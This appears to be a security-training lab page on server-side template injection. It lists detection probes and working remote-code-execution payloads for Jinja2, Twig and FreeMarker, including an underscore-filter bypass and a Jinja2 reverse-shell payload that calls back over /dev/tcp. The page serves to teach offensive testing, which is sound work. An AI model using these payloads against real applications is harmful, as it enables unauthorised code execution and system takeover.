๐ŸŽฏ Lab Objectives

  • Identify SSTI vulnerabilities using mathematical probe payloads
  • Fingerprint the template engine from error messages and output
  • Exploit Jinja2 SSTI for full RCE on Flask/Python applications
  • Exploit Twig SSTI on PHP applications
  • Exploit Freemarker SSTI on Java applications
  • Bypass SSTI filter restrictions using alternative payloads

Topics Covered

  • Template engine concepts and server-side execution context
  • Detection methodology โ€” mathematical fuzz payloads
  • Jinja2 (Python/Flask) exploitation chain via MRO traversal
  • Twig (PHP) exploitation
  • Freemarker (Java) exploitation
  • Sandbox escape techniques

Detection

# Basic math probe โ€” if result is evaluated instead of echoed literally, SSTI exists
{{7*7}}     โ€” 49  (Jinja2/Twig)
${7*7}      โ€” 49  (FreeMarker/Velocity)
<%= 7*7 %> โ€” 49  (ERB/EJS)

# Fingerprint the engine
{{7*'7'}}   โ€” 7777777  (Jinja2 โ€” string multiplication)
{{7*'7'}}   โ€” 49       (Twig โ€” numeric coercion)

Jinja2 (Flask/Python) Exploitation

# Classic MRO traversal to reach subprocess
{{''.__class__.__mro__[1].__subclasses__()}}
# Find subprocess.Popen index (commonly around 258)
{{''.__class__.__mro__[1].__subclasses__()[258]('id',shell=True,stdout=-1).communicate()}}

# Shorter chain using globals
{{self.__init__.__globals__['os'].popen('id').read()}}

# Bypass underscore filter using request attributes
{{request['__class__']['__mro__'][1]['__subclasses__']()}}

# Reverse shell
{{''.__class__.__mro__[1].__subclasses__()[258]('bash -i >& /dev/tcp/IP/PORT 0>&1',shell=True)}}

Twig (PHP) Exploitation

# RCE via filter callback registration
{{_self.env.registerUndefinedFilterCallback("exec")}}
{{_self.env.getFilter("id")}}

FreeMarker (Java) Exploitation

# RCE using Execute utility class
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
โœ…
Lab Complete! Mark it done below and continue your learning path.
โ† All Labs
// guided terminal

Try It Live

Type the commands from the steps above. The terminal simulates the expected output for this lab.

KaliRange ~ Terminal type help for commands
๐Ÿ“–
Sign in to track progress